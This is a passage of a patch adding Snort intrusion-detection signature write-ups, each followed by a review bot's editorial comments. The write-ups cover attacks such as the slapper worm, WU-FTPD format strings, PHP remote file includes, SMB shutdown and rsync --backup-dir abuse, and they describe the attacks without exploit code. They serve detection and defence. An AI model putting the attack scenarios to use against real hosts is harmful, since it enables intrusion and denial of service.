+Serious. Denial of Service.
+
+--
+Detailed Information:
+Microsoft Windows Terminal Server for NT systems fails to correctly
+validate RDP data from client machines that do not use encryption.
+
+--
+Affected Systems:
+	Microsoft Windows Terminal Server
+
+--
+Attack Scenarios:
+An attacker can use one of the publicly available exploit scripts to
+cause the DoS.
+
+--
+Ease of Attack:
+Simple. Exploit software exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patch.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
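Review bot: The Sid field is empty; the file is named 2418.txt, so the line under "Sid:" should presumably read 2418, and without it the description cannot be matched to the rule. "Rule:" also carries trailing whitespace. Additional References is empty although Detailed Information describes a specific Terminal Server RDP validation flaw and Corrective Action says "Apply the appropriate vendor supplied patch"; the vendor bulletin should be cited.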
--- /dev/null
+++ b/doc/signatures/3273.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid:
+3152
+
+-- 
+Summary: 
+This event is generated when an attempt is made to access a host running
+Microsoft SQL Server or utilizing MSDE via the default "sa" account.
+
+-- 
+Impact: 
+Information disclosure. Unauthorized access to the host.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to access a host via the
+"sa" account using brute force techniques to guess a password.
+
+Microsoft SQL server and MSDE components use a default "sa" account with
+a default password as the administrative user for the database
+installation. This event indicates that numerous failed attempts have
+been made to access the target host using this account.
+
+--
+Affected Systems:
+	Microsoft SQL Server 2000
+	Microsoft SQL Server 7.0
+	Systems using Microsoft MSDE components
+
+--
+Attack Scenarios:  
+An attacker can use an automated script to gain access to a host and the
+database contents as an administrator by repeatly attempting to login
+using the "sa" account and different passwords.
+
+Some worms also try to brute force entry using this methodology.
+
+-- 
+Ease of Attack: 
+Simple,
+
+-- 
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches
+
+Change the default "sa" password
+
+Disable the "sa" account.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
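Review bot: The Sid in the file (3152) does not match the file name (3273.txt); one of the two is wrong and must be resolved before the documentation is installed, since descriptions are looked up by Sid. Also "Simple," in Ease of Attack should end with a period, "repeatly" should be "repeatedly", both "None Known" entries lack a period, and Additional References is empty.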
--- /dev/null
+++ b/doc/signatures/1453.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1453
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
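Review bot: "running ona web server" in Detailed Information should be "running on a web server", and "attackers choosing" (in Impact and in Detailed Information) should be "attacker's choosing". Additional References is empty; since the Summary describes a generic class of CGI vulnerabilities rather than one product, the section should either cite a general reference or state that none apply.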
--- /dev/null
+++ b/doc/signatures/1887.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Sid:
+1887
+
+--
+Summary:
+This event is generated when a web server infected by the slapper worm attempts to infect a web server running OpenSSL.
+
+--
+Impact:
+Attempted remote access.  The slapper worm attempts to exploit a buffer overflow vulnerability associated with vulnerable versions of OpenSSL, permitting the execution of arbitrary code on the vulnerable server.
+
+--
+Detailed Information:
+The Apache/mod_ssl worm, also known as slapper, exploits a buffer overflow vulnerability associated with certain versions of OpenSSL. It spreads by attempting to infect other vulnerable web hosts listening on TCP port 443.  If the attack is successful, the worm gains control over the vulnerable host and attempts to spread to other hosts.  
+
+--
+Affected Systems:
+Linux hosts running Apache with mod_ssl using SSLv2-enabled OpenSSL 0.9.6d or earlier on Intel x86 architectures.
+
+--
+Attack Scenarios:
+The slapper worm attempts to exploit a buffer overflow vulnerability associated with OpenSSL, permitting the execution of arbitrary code on the vulnerable server and facilitating the spread of the worm.
+
+--
+Ease of Attack:
+Simple.  Exploit code exists. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the appropriate patch or upgrade to the most current version of OpenSSL.
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CERT
+http://www.cert.org/advisories/CA-2002-27.html
+
+--
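Review bot: The reference label "CERT" has no trailing colon, unlike "Arachnids:" and "CVE:" in the sibling files of this patch; suggest "CERT:". The rest of the entry is consistent: Affected Systems narrows the scope to SSLv2-enabled OpenSSL 0.9.6d or earlier on Linux/x86, which matches the port 443 worm behaviour described in Detailed Information.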
--- /dev/null
+++ b/doc/signatures/2299.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2299
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
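Review bot: The Attack Scenarios text ("An attacker can access an authentication mechanism and supply his/her own credentials ... to the underlying PHP script") is generic CGI boilerplate that does not describe the vulnerability given in Detailed Information (unchecked user input leading to PHP code execution, file inclusion and retrieval of sensitive files); it should be rewritten around that. Additional References is empty for a rule targeting a specific application version (Proxy2.de Advanced Poll 2.0.2), and "attackers choosing" in Impact should be "attacker's choosing".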
--- /dev/null
+++ b/doc/signatures/1641.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+1641
+
+--
+Summary:
+This event is generated when potential Denial of Service (DoS) traffic is detected on the network. 
+
+--
+Impact:
+Serious. A DoS attack may be underway.
+
+--
+Detailed Information:
+This event indicates that DoS traffic has been detected. An attempt to exhaust resources on a host may be underway leading to the host being unavailable for legitimate use.
+
+--
+Attack Scenarios:
+An attacker may attempt to exhaust resources available on a host leading to the host being unable to respond to legitimate requests.
+
+--
+Ease of Attack:
+Simple to Difficult.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
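Review bot: The Corrective Action section is compromise-response boilerplate ("Perform proper forensic analysis on the suspected compromised host ... Rebuild a confirmed compromised host") that does not fit a rule whose Summary and Impact describe DoS traffic against a host; the advice should address the DoS itself (identify the source, filter or rate-limit it at the firewall). This file also has no "Affected Systems" section, and the Summary never says what traffic pattern the rule matches, so "potential Denial of Service (DoS) traffic" gives an analyst nothing to verify.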
--- /dev/null
+++ b/doc/signatures/100000843.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000843
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Koobi Pro" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "showtopic" parameter in the "index.php" script used by the "Koobi Pro" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Koobi Pro
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
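Review bot: The Impact text ("system integrity compromise", "execution of arbitrary code of the attackers choosing") is the remote-file-include boilerplate from the sibling files, but this rule covers a cross site scripting flaw in the "showtopic" parameter; Impact should describe XSS consequences (script execution in the victim's browser, theft of session data), consistent with the Attack Scenarios line about a malicious link. "All systems running CGI applications using Koobi Pro" under Affected Systems should simply name Koobi Pro. Formatting: the file starts with two blank lines, and the "--" after the Sid, after Affected Systems and after Contributors lacks the preceding blank line the other files use.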
--- /dev/null
+++ b/doc/signatures/1242.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1242
+
+--
+Summary:
+This event is generated when an attempt is made to access the .ida Indexing Service ISAPI filter. 
+
+--
+Impact:
+Intelligence gathering activity. If an .ida file is erroneously shared from a network share, an error message is returned from a request that contains the share path will be disclosed.
+
+--
+Detailed Information:
+Microsoft Internet Information Service (IIS) installs several Internet Service Application Programming Interface (ISAPI) extensions.  The .ida ISAPI filter provides support for administrative scripts.  Files with the .ida suffix should not be located on network shares.  If an attempt is made to access them from a network share, an error message is returned disclosing the share path.  
+
+--
+Affected Systems:
+Hosts running IIS 4.0
+Hosts running IIS 5.0
+
+--
+Attack Scenarios:
+An attacker can attempt to access a file with the .ida suffix in an attempt to receive an error message with disclosure about the share path.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+The HotSaNIC (hotsanic.sourceforge.net) System and Network Info Centre
+can graph the occurence of worms attacks on a server against time. The
+HotSaNIC system displays 'WEB-IIS ISAPI .ida access' attempts on the
+server in images named default.ida-year.gif, default.ida-month.gif,
+default.ida-week.gif and also using a web page default.ida.html. Each
+time any of these components are accessed it generates an event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Do not place files with the .ida suffix on a network share.
+ 
+
+--
+Contributors:
+Original rule written by Dr SuSE and C. Mayor 
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+False positive information contributed by Chris McMahon <chris@mcmahon.co.uk>
+--
+Additional References:
+
+Arachnids
+http://www.whitehats.com/info/IDS552
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0071
+
+
+--
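Review bot: The Impact sentence is garbled: "an error message is returned from a request that contains the share path will be disclosed" runs two clauses together; suggest "an error message that contains the share path is returned". Also "occurence" in False Positives should be "occurrence" and "worms attacks" should be "worm attacks", the Corrective Action section contains a stray line holding only a space, the "--" after Contributors has no blank line before it, and the reference labels "Arachnids" and "CVE" lack the trailing colon used elsewhere in the patch.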
--- /dev/null
+++ b/doc/signatures/1971.txt
@@ -0,0 +1,79 @@
+Rule:
+
+--
+Sid:
+1971
+
+--
+Summary:
+Someone has attempted a format string attack that is successful against 
+the SITE EXEC command on vulnerable versions of WU-FTPD.
+
+
+--
+Impact:
+Severe; remote root compromise possible if user is running a version of 
+WU-FTPD prior to 2.6.2 as root.
+
+
+--
+Detailed Information:
+This attack is a format string attack against the implementation of the 
+SITE EXEC command in Washington University's ftp daemon.  This 
+vulnerability was widespread, due to the widespread use of wu-ftpd in 
+many of the Linux distributions. 
+
+This is an input validation problem, as wu-ftpd is not checking the user
+input that is passed directly into a format string for a printf/sprintf 
+function. With specific malicious data, it is possible to overwrite the 
+return address of the stack.  If properly done, when the function 
+attempts to return, it will return to the overwritten return address of 
+the function and it is possible to execute arbitrary commands.
+
+If running a vulnerable version of WU-FTPD as an anonymous ftp server, 
+this increases the exploitability dramatically, as the exploit must run 
+after a "user" has logged into the server.  Running the server allowing 
+anonymous logins means that any user, anywhere can log into the ftp 
+server and run the command.
+
+--
+Affected Systems:
+	Multiple vendor distributions of wuftpd  2.6.1 and earlier.  
+
+--
+Attack Scenarios:
+Attacker logs into an anonymous ftp server, checks to see if the SITE 
+EXEC command is implemented, and if it is, exploits the format string 
+attack, and executing arbitrary commands on the server. In most default 
+implementations of WU-FTPD the daemon was running as root and allowed 
+anonymous login.  If this is the case, the attacker would now have root 
+access to the system.   
+
+--
+Ease of Attack:
+Simple. Exploit scripts are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Patch all instances of WU-FTPD to the latest version, 2.6.2, as well 
+disallow anonymous access to the server.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Mike Poor <mike.poor@sourcefire.com>
+
+--
+Additional References:
+
+
+--
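Review bot: The Summary states the format string attack "is successful", which the rule cannot know from observing the SITE EXEC request; the other files use "an attempt is made to ...", and this one should too, or the text should explain what in the traffic indicates success. The Attack Scenarios sentence "exploits the format string attack, and executing arbitrary commands" needs "executes". Additional References is empty for a widely documented wu-ftpd vulnerability with a fixed version (2.6.2) given in Corrective Action; a CVE or CERT advisory should be cited.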
--- /dev/null
+++ b/doc/signatures/100000729.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000729
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Geeklog" application running on a webserver. Access to the file "functions.inc" using a remote file being passed as the "$_CONF[path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "$_CONF[path]" parameter in the "functions.inc" script used by the "Geeklog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Geeklog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
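Review bot: The third Detailed Information paragraph ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server ...") is the generic credential-validation text and repeats what the first two paragraphs already say about the "$_CONF[path]" remote file include; drop or trim it, and correct "ona" to "on a". The Attack Scenarios text about supplying credentials to an authentication mechanism likewise does not describe a remote file include. Additional References is empty, and the "--" after the Sid, after Affected Systems and after Contributors lacks the blank line used elsewhere.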
--- /dev/null
+++ b/doc/signatures/100000333.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000333
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Artmedic Newsletter" application running on a webserver. Access to the file "log.php" using a remote file being passed as the "logfile" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "logfile" parameter in the "log.php" script used by the "Artmedic Newsletter" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Artmedic Newsletter
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2520.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2520
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
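Review bot: Additional References is empty although the Summary calls this "a known vulnerability" in Microsoft's SSL library; add the Microsoft security bulletin and CVE entry so a reader can confirm which hosts are patched. Corrective Action could also state what Detailed Information already implies: the vulnerable service stops handling requests, so the alert should be correlated with SSL service availability on the target. Typo in Attack Scenarios: "attcker".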
--- /dev/null
+++ b/doc/signatures/2996.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2996
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a Windows
+system via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a Windows
+system via SMB across the network.
+
+It may be possible for an attacker to manipulate a Windows system
+from a remote location. Shutting down a system may lead to a Denial of
+Service for the target host.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may be able to manipulate a target system using SMB. The
+attacker may gain complete control over the affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
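Review bot: Impact says only "Serious." while Detailed Information describes a Denial of Service; state "Denial of Service" in Impact so it matches the other files in this patch. Attack Scenarios' "may gain complete control over the affected system" is not supported by the rest of the text, which describes a shutdown request; either drop it or explain that a remote shutdown only succeeds with an account that already holds shutdown rights, which is the more useful point for an analyst triaging the alert. Inconsistent capitalisation: "None Known." under False Negatives versus "None known." elsewhere.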
--- /dev/null
+++ b/doc/signatures/1992.txt
@@ -0,0 +1,57 @@
+Rule:  
+
+--
+Sid:
+1992
+
+--
+Summary:
+This event is generated when an attempt is made to list directories outside the ftp root directory.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can lead to information disclosure and possible exposure of sensitive system information.
+
+--
+Detailed Information:
+Some versions of the QVT FTP server from QPC Software allows browsing the directory structure of a host using a directory traversal technique.
+
+--
+Affected Systems:
+QPC Software QVT/Net 4.0 for Windows NT, 2000 and 9x
+QPC Software QVT/Term 5.0 for Windows NT, 2000 and 9x
+Other FTP servers may be vulnerable
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal technique, to browse folders outside the ftp root directory. Information gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
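Review bot: Additional References is empty for a rule tied to two named products (QVT/Net 4.0, QVT/Term 5.0); add the Bugtraq or CVE entry the Affected Systems list was taken from. Detailed Information has a number-agreement error: "Some versions ... allows" should be "allow". False Positives and False Negatives are missing their full stops, unlike the other files.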
--- /dev/null
+++ b/doc/signatures/106-4.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+106-4
+
+--
+Summary:
+This event is generated when the pre-processor spp_rpc_decode detects
+network traffic that may constitute an attack. Specifically an
+incomplete rpc segment was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the spp_rpc_decode pre-processor detects
+network traffic that may consititute an attack.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
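Review bot: Attack Scenarios is empty, and Ease of Attack says "Simple." for an event whose Impact is "Unknown."; either describe the scenario (an incomplete RPC segment is what a fragmented RPC request looks like on the wire, whether from deliberate evasion or a broken client) or mark the section as not applicable rather than leaving it blank. Detailed Information repeats the Summary verbatim; point the reader at the rpc_decode preprocessor documentation in the snort source, as the sfPortscan file in this patch does for its preprocessor. Typo: "consititute".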
--- /dev/null
+++ b/doc/signatures/2221.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2221
+
+--
+Summary:
+This event is generated when an attempt is made to access ws_mail.cgi on an internal web server. This may indicate an attempt to exploit a remote command execution vulnerability in cgiCentral WebStore 400 4.14.
+
+--
+Impact:
+Execution of arbitrary code. An attacker must be an authenticated WebStore administrator to successfully execute this exploit.
+
+--
+Detailed Information:
+cgiCentral WebStore 400 is an online shopping cart application for web servers. It contains a vulnerability in the "kill" parameter, where a malicious user with an authorized administrative WebStore account can execute arbitrary code on the web server and gain root access to the compromised server. 
+
+--
+Affected Systems:
+Any web server running cgiCentral WebStore 400 4.14 or WebStore 400 CS 4.14.
+
+--
+Attack Scenarios:
+An attacker with a valid WebStore administrator account sends a specially crafted HTTP request with shell commands in the URL's kill parameter. The shell commands are then executed with the security context of the server, allowing the attacker to obtain root access to the compromised machine.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses ws_mail.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+It is unknown if this vulnerability was fixed with WebStore 4.15. Contact the vendor, RDC Software (http://www.ratite.com/) for more information.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/2861
+
+--
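Review bot: Attack Scenarios contradicts itself: commands "executed with the security context of the server" only yield "root access" if the web server runs as root, so say that the commands run as the web server user and that root follows only in that configuration; Detailed Information makes the same unqualified root claim. Corrective Action "It is unknown if this vulnerability was fixed with WebStore 4.15" is a stale open question; either confirm against the Bugtraq entry already referenced (bid 2861) or say plainly that no fixed version is known. The False Positives note is the kind of tuning hint the other files lack and should stay.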
--- /dev/null
+++ b/doc/signatures/1336.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1336
+
+--
+Summary:
+Attempted chmod command access via web
+
+--
+Impact:
+Attempt to change file permissions on a webserver.
+
+--
+Detailed Information:
+This is an attempt to change file permissions on a machine. Using this
+command an attacker may change the permissions of a file to suit his own
+needs, make a file readable, writeable or excutable to other groups and
+users that wouldotherwise not have these special permissions.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains '/bin/chmod'
+in the URI whichcan then change file permissions of files present on
+the host.Thiscommand may also be requested on a command line should
+the attacker gainaccess to the machine.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries
+outside ofit's designated web root or cgi-bin.Whenever possible,
+sensitive files andcertain areas of the filesystem should have the
+system immutable flagset to negate the use of the chmod command. On
+BSD derived systems,setting the systems runtime securelevel also
+prevents the securelevelfrom being changed. (note: the securelevel can
+only beincreased)
+
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1337
+sid: 1338
+
+man chmod
+
+--
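Review bot: The last sentence of Corrective Action is circular: "setting the systems runtime securelevel also prevents the securelevel from being changed" should say that a raised securelevel prevents the immutable flag from being cleared (the parenthetical that securelevel can only be increased then makes sense). The file also lacks the Affected Systems section present in every other signature file, and many words have lost their separating spaces ("wouldotherwise", "whichcan", "host.Thiscommand", "gainaccess", "ofit's", "andcertain", "flagset", "securelevelfrom", "beincreased"), which will defeat text search on this file. "excutable" and "it's designated web root" should read "executable" and "its".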
--- /dev/null
+++ b/doc/signatures/2561.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+2561
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability
+associated with rsync.
+
+--
+Impact:
+A successful attack may allow files to be existing files to be overwritten
+or new files created on the rsync server.
+
+--
+Detailed Information:
+rsync is used to remote copy files.  A command line option "--backup-dir"
+can be used to specify a directory where backup files are to be placed.
+There is no validation of the argument supplied to this option to scrutinize
+it for proper formatting.  A malicious user can try to overwrite existing
+files or create new ones on a vulnerable host by supplying a value to
+"--backup-dir" that is relative to the root directory.
+
+--
+Affected Systems:
+Many Unix and Linux distributions running rsync.
+See http://www.securityfocus.com/bid/10247 for affected operating systems.
+
+--
+Attack Scenarios:
+An attacker can send a rsync command supplying the -backup-dir option
+with a path relative to the root file system, overwriting or creating
+new files on the vulnerable host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+Run the rsync server in a chroot environment.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+--
+Additional References
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0426
+
+Bugtraq:
+http://www.securityfocus.com/bid/10247
+
+--
